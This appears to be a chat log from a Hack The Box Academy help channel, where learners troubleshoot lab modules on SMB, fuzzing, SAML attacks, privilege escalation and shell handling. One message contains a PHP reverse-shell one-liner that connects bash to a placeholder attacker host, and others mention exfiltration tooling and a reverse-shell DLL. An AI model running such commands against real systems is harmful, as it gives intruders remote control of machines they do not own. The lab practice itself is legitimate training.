Hello could someone help me, im new to all this, im in the getting started module specifically on the service scanning part and needed help to get the password needed to answer this question of listing the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file
did you add the vhost?
Yeah, I'm actively searching the website, but I don't see an upload
unless I'm supposed to do it through status.inlanefreight.local and not the IP that you spawn in
thats the point of the vhost
yeah I put the IP to the vhost, but I get different websites lol
exactly
what have you tried?
so in that case, which am I supposed to use? the IP address or status.inlanefreight
See that's dumb I'm scanning this website trying to brute force directories to find it
lol that was simple thanks for the help there
ive done smbclient -N -L \\10.129.42.253, but i didn't see anywhere in the module that the password was given
says that you need to authenticate as bob, maybe try doing that
what would the command be to do that?
don't remember the flag off the top of my head but you can print the help menu for smbclient
or do man smbclient
ok sounds good thank you
what module
Hey guys im in web proxies assessment, question 1
I added a match replace rule to change from disabled> to enabled>, response body, when I test the rule in proxy settings on burp suite it works but when I send the request to repeater and I get the response back its still disabled>
i dont think it goes through repeater
but repeater should be able to bypass that
What's is "it"?
the rule
the 'getting started' module in the cpts certification and im on the service scanning page
So why is it possible to create a rule if you can't use it?
they give you the password in the section
probably cause it's proxy settings and not repeater?
ok ill read over it carefully thank you!
So you can't change responses?
can someone help plz?
OK, so I'm working on the skills assessment of the file upload module, I've exfiltrated the source files and figured out how things work as best I can. I've got the upload directory location and how the script names the file. However, the issue that I'm running into is actually finding and executing the file. I keep trying to navigate to the image to execute the code but I keep getting 404 responses. Any thoughts?
dont think so
what did u do?
did you input a url with the payload?
i just copied the domain is there anything else to do?
did you follow the example?
then you got the wrong file location
you should be able to find it with the source
I'll go back and re-read it.
Okay this was most definitely the most stupid question I've ever seen on HTB. Holy cow that was such a waste of time I want to sit down with whoever created this box and study his old childhood traumas
Such bs, I made a script that did the exact same thing as burp and after 32 attempts it gave me the flag
Lmao nice work
Anybody having trouble with the Windows Lateral Movement labs this morning. I can't RDP with provided credentials, I've changed VPN and restarted machines many times.
Just keep getting [11:16:28:048] [4800:4800] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
The same way you'd do it on a VM, download the ovpn file and open it with ovpn.
Are you wrapping the username/password in single quotes?
I've tried, and I've also tried with Remmina
which section
The WSUS, and also the skills assessment.. no ping back on any protocol for the provided creds
I just launched the WSUS section and was able to connect to the target via RDP with the provided credentials. Did you change VPN regions, and afterwards did you completely reload the website (CTRL+SHIFT+R)?
Maybe you have the correct information but aren't using the proper path to the uploaded file? I'd have to see it to know for sure.
I am currently studying the blood hound module of AD. When I connect to the target machine from pwnbox as described and run the prepared sharphound.exe, I get an error and cannot get the information. How can I deal with this?
What is the error
I am using the credentials provided in the module and I am able to get a shell with evil-winrm and impacket-wmiexec. However, RDP does not connect. The error is as follows
|ERROR|Unable to connect to LDAP, verify your credentials
which section
hey can someone tell me if we can hack the cubes htb
That'd be illegal
Visualizing the Data:Nodes
im a teen my parents wont allow me to spend money so any suggestion how i can keep going without spending money
some modules are expensive like 500 cubes
#giveaways ; participating in CTFs, selling your soul
¯\_(ツ)_/¯
tell your mom that it's better than spending money on VBux
how can i speed this up?
i did a scan of -sU -sV -vv -Pn -p- --disable-arp-ping
you cry
you don't necessarily need to do -sU btw
why sir
you just don't 
i always get filtered or closed port on port 53
but sometimes it's just a silly thing with it
im trying to learn how to get past ids/ips
i did -T 0 on that i forgot to include hahaha
-T 0 is slowest timing
it just makes the output more verbose
stop being a skid and just trying things and actually read documentation
How old are you?
Get parental consent buddy. You need to be 18 or over or have consent
that's the active CTF yeah?
oh wait no i didnt get it on google, ippsec always uses it, i just copied his scan ahahaha
yeah still trying to learn
even still. Blindly copying and pasting makes you a skid
the man pages are gonna be your friend for any command
man <command> or <command> --help
but why it is free for everyone
Terms of Service bud
there is no age limit
yeah ill take that as inspo tyty
On the website it is 18+
but im not blindly copying, i always ask gpt about whatever i use
GPT isn't perfect
i barely trust GPT to give me accurate results
it's an OK tool for basic stuff, but it shouldn't replace classic research and reading
copy sir ill take note of that
does this look good
i will always tell you: Try before asking
whats the pdf about ...? its 14 pages long, too large to read
contradict yourself in the next 5 seconds bruh
User Agreement
mybad
literally one of the things you agree to when you sign up to htb
@drifting trail this is the important bit
- Access and Use of the Services.
You must be at least 18 years old, and you must register under your real name and valid email.
2.1. Eligibility Requirements. To access and use our Services, you are required to meet the following eligibility
criteria:
(a) You must be at least 18 years of age.
(b) You need to have read, understood, and agreed to this User Agreement and our Privacy Notice.
(c) You must register for an account using your actual name and a valid email address.
(d) You should not be subject to any restrictions that prevent you from using the Services. This includes,
but is not limited to not being:
a. Legally or regulatorily barred from using the Services in your jurisdiction.
b. A resident or citizen of any jurisdiction under sanctions imposed by the UN, US, UK, or EU.
c. Personally subject to sanctions by the UN, US, UK, or EU.
2.1.2. Underage Users. If you're under 18, a parent or guardian over 18 must accept this User Agreement on
your behalf, thereby assuming responsibility for your compliance with these terms.
okay if i get my parents consent is that okay ...?
there's a whole form; reach out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
heh found a typo in the UA. sec 4 sub 5 (4.5)
Nice one
we require that individuals under 18 years of age obtain parental or legal guardian consent before registering for an account and using our services. so i can get my parents consent
Yea, and fill the form and send it to support
no biggie, in a min
stating that your parent/guardians understand that HTB is not liable if you do some dumb skid shit and try and hack the government ||and get a visit/call from a 3-letter agency||
i know i have read that stuff ages ago
can i find a guide or something which help me to complete OPTinselTrace24-2: Cookie Consumption
No
this wouldn't be the right channel anyway
it's an active sherlock, so sharing writeups is explicitly against ToS
#sherlocks ; you'll need to link your account via the #welcome message
what does this mean
add --max-retries=3
also i suggest resetting the lab between attempts in the event that it's blocking you
if you trip the alerts it does temp block you
copy that, thank you for letting me know, that is one of my problems as well
Hello guys,
I'm completely stuck on Rapid Triage Examination & Analysis Tools from Introduction to Digital Forensics.
I've tried some things with Timeline Explorer then in MFTExplorer but I can't get the answer...
I can't even find uninstall.exe but I know i need its zone.identifier...
hey if any could help , im in module injection attacks skill assessment , i reached to the internal app and its parameter but i can't craft the payload that gets all records especially since pdf is so small
May I please get help with the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab? It seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". I've also checked to ensure the XML isn't broken.
if you are beautifying or whichever, dont
I got stuck there due to the code being beautified
I'd seriously appreciate some help on the medium lab in Network enumeration with nmap - IDS/IPS evasion techniques. I've tried using multiple flags such as -sS, -Pn and built in nmap scripts but its either returning as filtered or erroring out.
It's one of the beginner modules so if anyone can lend a hand I'd be ecstatic
I wasn't intentionally beautifying it, and the Burp SAML Raider extension did work on the earlier signature stripping attack so I didn't think that would be the cause. I'll try again, removing newlines.
Thank you
I got the flag! Thanks for your help!
It was so easy to do manually without SAML Raider once I did it in a text editor. Before when I failed, I was also doing it in a text editor but I had copied it from the SAML Raider tab in Repeater.
great job
I'm getting this when attempting Windows PrivEsc -> User Account Control lab.
If I run it twice first time it works second time it displays this, third time works XD
but I do not get a connection back in any of these
I'm using a windows-based attack host (Commando VM)
windows firewall on my device is disabled.
and this is the newest Metasploit version.
I tried pinging me from the target and it worked.
so idk why I'm not getting a connection back
This DLL just won't work....
I guess you configured the 'sttstr.dll' to invoke reverse shell.
Maybe it is something with your connection? try configuring the dll to add an administrator user.
Or alternatively, what command did you use to invoke the dll?
Hello is there anyone that can help me with my iPhone I have an iOS 18.2 installed and I installed it yesterday, I was initially on iOS 17.5.2 and decided to go on 18.
I downloaded an app called Scarlet and enabled it to be trusted on my iOS 17, and after upgrading to iOS 18 it was still working. The following day I tried to open it and it said the app could not be verified for its integrity. Could anyone tell me what's going on?
This has nothing to do with htb academy
It doesn't. Sounds like the app needs to be updated but it's not related to htb academy or any of the learning modules, so it's not for this channel
I can't send images here?
read and follow #welcome
Its not showing follow. I think I already followed it
I'm stuck on Information gathering DNS zone transfer. I'm not sure where I'm going wrong, following the example in the lesson. Anyone here know what I'm doing wrong?
Since your username is white, I think you have not yet verified your user.
Tried in both my own machine and the pwnbox
.htb is not an official top-level domain. It can therefore not be resolved from the root servers.
Specifies the IP address of the target as the name server.
Roger thanks
How do I get verified pls
read and follow #welcome
Has anyone been able to answer this question? Looks like its been an issue for a while, I'm having the same problem.
Intro to Binary Fuzzing > Glee with Klee Question #2, running it I only receive one error (null page access) that the module won't accept as the answer.
I've done that
It's showing "done reading, checkout modules"
Oh, I don't think I ever did that
Lemme try that
Got it, I had to add the IP to the /etc/hosts file
It is done, thank you very much
Pls I really need help with this, I've tried searching for exploitable open services, I got the openssh 9.2p1 (regreSSHion) but I just can't find an exploit for it.
I've tried checking with searchsploit and metasploit but still no result
Read the topics for DNS again.
If you specify a domain as a name server, it must first be resolved.
Sure, you can put the domain in the /etc/hosts file. But your PC still has to resolve the domain every time.
Therefore, whenever possible, use the IP address of the name server and not the domain
Instead of dig @one.one.one.one example.com you should use dig @1.1.1.1 example.com
You are not scanning the correct port
Oh, I should have only scanned for port 57897 right
I was trying that but it kept timing out for some reasons. Worked once I added the target IP address to the hosts file. Is that the incorrect way?
It's not incorrect. It just takes several queries.
So first it has to resolve the name of the name server in order to then query it.
can anyone help, i can't talk in general
Read and follow #welcome
Hey guys i'm doing the python3 module and i'm stuck with this error, can someone help me?
Is BeautifulSoup installed?
yes i checked, uninstalled, reinstalled but still same problem
also tried to run in a virtual env but it doesn't work, same error
Is there an order to follow in the paths like senior web and cape?
I recommend working through the modules in the order of the path.
There are some introductory modules, but it's unclear what the order is for them, e.g. learning process, setting up etc.
Is there a recommended order to those?
Just following this path
https://academy.hackthebox.com/path/preview/information-security-foundations
Ahhh, right thanks
Hi everyone, I'm new here, I have to connect by ssh, I'm in the module linux fundamentals, everything is set up, but it doesn't accept the password, can someone help?
I've already downloaded and connected with their openvpn tcp 443
Hey, doing the Skill A 1 of AD from cpts, any clue where i can find the exe of Rubeus and import it into the victim machine (MS01) or compile it directly there ?
@somebody can help with this?
send the code directly, looks like a circular import issue
```python
import requests
import re
from bs4 import BeautifulSoup

PAGE_URL = 'http://target:port'

def get_html_of(url):
    # Fetch the page and bail out on anything other than HTTP 200
    resp = requests.get(url)
    if resp.status_code != 200:
        print(f'HTTP status code of {resp.status_code} returned, but 200 was expected. Exiting...')
        exit(1)
    return resp.content.decode()

html = get_html_of(PAGE_URL)
soup = BeautifulSoup(html, 'html.parser')
raw_text = soup.get_text()
# Split the visible text into words
all_words = re.findall(r'\w+', raw_text)

# Count how often each word occurs
word_count = {}
for word in all_words:
    if word not in word_count:
        word_count[word] = 1
    else:
        current_count = word_count.get(word)
        word_count[word] = current_count + 1

# Print the ten most frequent words
top_words = sorted(word_count.items(), key=lambda item: item[1], reverse=True)
for i in range(10):
    print(top_words[i][0])
```
sorry for the long cp guys
its same as in the module
Any nudge on this (1747) Crackmapexec skills Assessment Question 3?
In same predicament have SQL01 rooted and for the hint in DEV01 suggests credential reuse + some sort of bypass. None of the creds I have are working on DEV01
then you need to install BeautifulSoup
why not trying another tool such as Kerbrute ?
I am also facing the same issue. Did you happen to solve this successfully?
Yeah make sure after getting the shell you make it stable using python.
That was the silly mistake
quick question all, i have a reverse shell up for an initial foothold ... i wanna run linpeas then get back the output... can i send it to the same nc listener or do i need a separate one just for the file transfer?
ie: does it handle multiple connections?
trying to figure out the best workflow for how to reduce complication on my end, wondering if this might be a strat
I use an http server on "host", in my case kali, that accepts uploads and downloads.
There are many Open Source projects on Github for that. I believe it makes it easy to exfil data.
So are you using a turnkey something or other you've setup with php and stuff that allows CRUD?
post/put for the file to the server?
I use this "https://github.com/IngoKl/HTTPUploadExfil"
dont know if i am allowed to post the link but i hope i am
its tooling, should be fine (as i understand the rules)
already tried
Uhm, if you wouldn't mind humoring me another question, perhaps a lil silly, when you connect to a reverse shell like this:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>
is this considered a "full tty"
ie: no need to run a python3 -c "import pty;pty.spawn(...)"
the php reverse shell im connected to, i cannot press up for past cmd, i cannot press left arrow to go left etc
earlier in the module it suggested that upgrading to full tty resolves this issue (but even when i did, i still couldnt use the arrows and other stuffs)
I am not 100% sure. What i can recommend, and a tool that i use, is Sliver c2
If you look into it and learn it, it will help you a bunch.
I believe you shouldn't ask this question here.
hi, i'm stuck with web attacks module skill assesment, please help me
oh shit its fucking cubes talks
holy fuck i was waiting all week for this and missed it
Where you stuck at?
Give me some info
oh god its WAY over
What have tools have you run?
I do fuzzing and find out APIs like api.php reset.php. and I read some hints from the hackthebox forum, but everyone mentioned api.php/user/<uid>. How can I know exactly /user/<uid>???
by fuwwing zith rqndo; nu;bersM
Best source to get the correct information is in the modules you have done. Go back and read again.
ow qwerty was activated
by fuzzing with random numbers i guess no?
no no, i mean "/user"
uid is a user unique identifier (number)
how to find "/user"?
also by fuzzing
with a wordlist
like ffuf -w wordlist.txt:FUZZ -u http://ip:port/FUZZ
hmm, thanks, i will try again
do you know how to work with ffuf first? @naive cedar
yes, i do
normally it's not that hard but tbh it's searching, sometimes the answer is in front of your eyes^^
but when i'm fuzzing with "ffuf -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://94.237.59.180:44841/api.php/FUZZ -recursion -fs 0", i can not get exactly "/user"
i can't find a way to fuzz to get exactly the url api.php/user/<uid>...
if you sure its user, make a list with 10 words in it with user to and test this wordlist, if it don't give you any results then you maybe doing something wrong
that's the question i'm wondering about...
i'm not sure but i think that when using recursion you have to specify the recursion-depth too
bcs its 0 in default
Intro to C2 Operations with Sliver > Constrained Delegation: After obtaining a TGT for the carrot user for eventsystem service, how do we use it to successfully execute ls //srv02.child.htb.local/c$ ?
show me a screen shot when you launch ffuf
huh, i think default is infinite?
but i cannot send screenshot here..
can me dms you ?
i do not have permission to post photos on this server
okay thanks
Then you can post as many photos as you like
i don't have any information to find out the url api.php/user/<uid>. the only thing i can get the module done is to accept /user, but i feel very frustrated when i can't find a way to find it

whether /user or a certain router is invalid. body size is always 0, so how to distinguish and accurately indicate /user?
nothing
body size always 0
did you add everything to the /etc/hosts file? if needed?
i haven't made that module so i'm trying to search with you
i think that is not necessary for this module
idk but when you navigate to the site you need to have something i mean a 200 response or something
the only thing i can say is if they found /user/ part its probably with ffuf
try to look back in the sections you probably missing something
so your question is how did they find /api.php/user?
web attacks skill assesment
my English is not really good, sorry for the inconvenience

but try to find it you own way
can't help you further, haven't seen those things yet sorry ^^
okay, thank you :3
hey guys i still have the same problem also with the htb machine (instance)
Have you tried using a venv?
source bin/activate
pip3 install beautifulsoup4
+1 that doesn't look like a pwnbox, most distros and for a fact kali install a "system managed" python, which as it was explained to me, the system uses for its own purposes, you don't want to commingle it with other peripheral packages even if they are pentesting related (and even still, again as explained to me, using pipx is not an ideal solution) venv is the most practical approach as i understand it
this is not my advice this was advice given to me by python devs
well i found out there is login information here, it took me 2 days just to look at such a small thing again....

hey bro i been there its part of the process
pip3 is awesome
in fact im still there, most days
(i think thats part of the process too)
It sucks, that's part of the fun, right?
"FUN"
I myself am very good at forgetting the ! in the password...
i even assumed it was the ssh login information in case of using the incoming openvpn file
dude wtf, how do people get linpeas output to a file? i'm getting a bunch of "error broken pipe" thrown from cat...
is this normal for ./linpeas.sh -a > linOut.txt
should i be tee-ing it instead?
there's so much output with linpeas i'll never be able to run both cmds then compare
how about replace by >>?
i'll try that but i think it's gonna do the same as > (>> just overwrites instead of append)
(file is new)
i have completed the module, thank you very much <333
2 a.m in Vietnam, sleep right now
.
You have it backwards, >> appends, > overwrites
thx yes that's what i meant
I genuinely rarely use linpeas
LinEnum seems more palatable
im trying to get familiar with how to digest this stuff tho, for the modules sake
Meh it just throws a lot of random shit at you
even ippsec has stated in a video or two that the output is just so extensive and unorganized that it makes it like unmanageable
@fathom pendant hope your friday is going awesome btw. if you'll humor me a question, if my reverse shell php file is the standard
<?php system("/bin/bash ...");?>
and when i get to the shell from my nc listener, if i can't scroll with the arrow keys or access previous cmds with the up arrow, i don't have a "full tty", would that be safe to say?
Yep
It's not a full shell
You can use python and the standard tricks to upgrade
There's also a neat tool called pwncat
is it redundant to run:
<?php system("/bin/bash ...");?>
followed by
python3 -c 'import pty; pty.spawn("/bin/bash")'
or would you skip the python cmd at that point and do the ctrl+z stuff stty raw; cols=...,etc.?
It's not redundant
are both not spawning identical "types" of bash? or is there more to it than that?
There's more to it
noted, thank you
Can anyone help with the Web Attacks skills assessment? I'm doing everything right so far but I keep getting "Missing Parameters"... in my response. Any tips would be greatly appreciated
@everyone
No
Then you probably did not send all the required parameters.
What is the request you try to send?
I'm currently on the Getting Started Module
in the section Public Exploits
the hint says to look for plugin exploits
i'm really stuck here
is it required to use burp suite here? since i tried and couldn't make it work
or is it easier? like msf?
can you be more specific what command are you trying to run
There is no need for burpsuite.
i will try harder thank you
i feel so stupid after completing the question
ive always heard from people that HTB is really hard and you need to search outside the module so i was going through SQL injection and burp suite
The answer is way easier lol
For HTB academy you don't really have to search outside the module that much
how long is linpeas running for?
Supp guys? Can I dm someone about the Skills Assessment of "MSSQL, Exchange, and SCCM Attacks "
Sure
Hi, I'm currently stuck in the Active Directory Enumeration & Attacks Module, in the AD Enumeration & Attacks - Skills Assessment Part I section, on question 4. I am unable to connect to MS01. I made sure my meterpreter session, socksproxy, and autoroute are set up properly. However, even after using proxychains with nmap or cme it cannot connect to it
let me go edit that in, don't believe I did that
i added the IP and domain into the /etc/hosts file, however no luck still
Working on the CME module...
Trying to get Empire running, but consistently comes up with ModuleNotFoundError: No module named 'jq' .... anybody else getting this in the latest Parrot OS? Have any work-around ideas. I know that jq is installed because I use it all the time.
I did all the normal things to make sure jq is installed including ... pip install .... --break-system-packages
Same error on Kali also.
As stated, stay on top of /etc/hosts, but also check your /etc/proxychains.conf
anyone have a solution when the module is stuck on deploying?
Hi, for the protected files section of password attacks, how do I get Kira's cracked password? The only question in the section says Kira's password is already cracked, so now I just need to get the ssh key, but I can't find Kira's password
where is Kira's password?
You used her password in an earlier section
Cry
man, and I can't open a ticket cause it's after business hourssssssss
You can still open a ticket
when it's happened before it's resolved itself in a few hours
which is def before monday so its fine
which section?